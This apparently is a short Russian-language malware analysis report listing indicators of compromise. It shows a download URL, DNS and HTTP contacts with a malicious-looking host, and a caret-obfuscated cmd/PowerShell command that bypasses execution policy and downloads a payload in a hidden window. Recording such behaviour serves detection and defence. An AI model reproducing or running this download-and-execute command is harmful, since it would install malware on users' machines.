Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^owe^rShEL^l.ExE^ -EXeCUTioN^pOl^i^cy bY^pASS -n^oP^rof^I^LE -w^in^d^OW^styLE HId^D^en (^nEw-oBjEc^T SY^sTem.NE^T^.^weB^C^LIEnT).^d^o^W^NLo^a^DFIlE('http://asecwitlecn.bid/read.php?f...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "P^owe^rShEL^l.ExE^ -EXeCUTioN^pOl^i^cy bY^pASS -n^oP^rof^I^LE -w^in^d^OW^styLE HId^D^en (^nEw-oBjEc^T SY^sTem.NE^T^.^weB^C^LIEnT).^d^o^W^NLo^a^DFIlE('http://asecwitlecn.bid/read.php?f...' (со скрытым окном)